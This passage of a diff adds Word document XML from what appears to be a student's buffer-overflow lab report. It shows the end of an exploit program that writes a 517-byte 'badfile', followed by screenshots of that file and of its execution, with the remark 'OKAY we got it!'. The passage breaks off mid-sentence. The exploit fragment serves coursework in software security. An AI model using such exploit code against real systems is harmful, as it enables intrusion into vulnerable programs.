+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* Save the contents to the file "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>" */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>fopen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"./</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"w"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>fwrite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>fclose</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>y “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605CEB90" wp14:editId="4212E167">
+            <wp:extent cx="2472083" cy="3876675"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+            <wp:docPr id="34" name="图片 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2487436" cy="3900752"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xecution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B71B77F" wp14:editId="42FBF666">
+            <wp:extent cx="5274310" cy="1120775"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
+            <wp:docPr id="33" name="图片 33"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1120775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>KAY we got it!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After task 2 I think the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
